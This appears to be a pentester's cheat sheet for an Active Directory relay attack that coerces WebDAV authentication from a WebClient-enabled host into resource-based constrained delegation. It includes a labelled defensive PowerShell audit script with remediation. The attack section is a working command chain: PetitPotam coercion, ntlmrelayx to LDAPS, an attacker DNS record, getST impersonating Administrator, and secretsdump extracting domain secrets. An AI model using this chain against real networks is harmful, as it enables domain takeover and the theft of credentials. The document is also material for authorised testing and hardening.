WebDAV WebClient

Resource: https://www.bussink.net/rbcd-webclient-attack/

Prerequisites

LDAP signing is not enforced on the Domain Controller (the default)
LDAPS channel binding is not required on the Domain Controller (the default)
Normal domain users are able to add machine accounts (the default ms-DS-MachineAccountQuota value is 10)
Normal domain users are able to create DNS records (or you have Local Admin access to a device registered in internal DNS and can set up a port forward)
At least one machine has the WebClient service enabled
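The prerequisites above are also the defender's checklist: if any of them is already in its hardened state, the chain below does not work. The following audit script is an added example (not from the original page): it runs on a Domain Controller in Windows PowerShell 5.1 with the RSAT ActiveDirectory module and reports whether each prerequisite is still in its weak default state. The registry value names (LDAPServerIntegrity, LdapEnforceChannelBinding) are the documented DC settings; the host list is a constructed placeholder.

```powershell
# Added audit example, not code from the original page.
# Run on a Domain Controller as an administrator (Windows PowerShell 5.1,
# ActiveDirectory module present). Reports the weak-default state of each
# prerequisite the page lists.

$ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'

# LDAPServerIntegrity: 1 = signing not required (default), 2 = signing required
$signing = (Get-ItemProperty -Path $ntds -Name LDAPServerIntegrity `
            -ErrorAction SilentlyContinue).LDAPServerIntegrity

# LdapEnforceChannelBinding: absent/0 = never, 1 = when supported, 2 = always
$cbt = (Get-ItemProperty -Path $ntds -Name LdapEnforceChannelBinding `
        -ErrorAction SilentlyContinue).LdapEnforceChannelBinding

# ms-DS-MachineAccountQuota lives on the domain naming context object
$domainDN = (Get-ADDomain).DistinguishedName
$maq = (Get-ADObject -Identity $domainDN -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'

[PSCustomObject]@{
    LdapSigningRequired        = ($signing -eq 2)
    LdapChannelBindingEnforced = ($cbt -eq 2)
    MachineAccountQuota        = $maq          # 0 closes the machine-account prerequisite
} | Format-List

# WebClient service state on member hosts. Constructed placeholder list:
# replace with your own scope. Get-Service -ComputerName needs Windows PowerShell 5.1.
$hosts = @('WS01', 'WS02')
foreach ($h in $hosts) {
    $svc = Get-Service -ComputerName $h -Name WebClient -ErrorAction SilentlyContinue
    if ($null -eq $svc) {
        "$h : WebClient service not present or host unreachable"
        continue
    }
    # Running, or Stopped with a trigger start, both mean the host can be coerced over WebDAV
    "$h : WebClient is $($svc.Status) (StartType $($svc.StartType))"
}
```

Remediation maps one-to-one onto the output: set LDAPServerIntegrity to 2 and LdapEnforceChannelBinding to 2 on every DC, lower ms-DS-MachineAccountQuota to 0, and disable the WebClient service by Group Policy on hosts that do not need WebDAV.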

Check which hosts have the WebClient service enabled

nxc smb scope.txt -d <DOMAIN-FQDN> -u '<USERNAME>' -p '<PASSWORD>' -M webdav

Add a DNS record for the attacker host if it does not already resolve in the domain

python3 dnstool.py -u '<DOMAIN-FQDN>\<USERNAME>' -p '<PASSWORD>' -a add -r <NS-RECORD-NAME> -d <ATTACKER-IP> <DC-IP>

Set up NTLM relay

sudo ntlmrelayx.py -t ldaps://<DC-IP> --http-port 8080 --delegate-access 

Coerce authentication

python3 PetitPotam.py -d <DOMAIN-FQDN> -u '<USERNAME>' -p '<PASSWORD>' '<HOSTNAME-ATTACKER-MACHINE>@8080/a' <WEBCLIENT-ENABLED-HOST-IP>

Create Kerberos ticket

impacket-getST -spn CIFS/<COMPUTER-NAME>.<DOMAIN-FQDN> <DOMAIN-FQDN>/<COMPUTER-USERNAME>\$ -dc-ip <DC-IP> -impersonate Administrator

Dump secrets

export KRB5CCNAME=Administrator.ccache
impacket-secretsdump -k <COMPUTER-NAME>.<DOMAIN-FQDN>
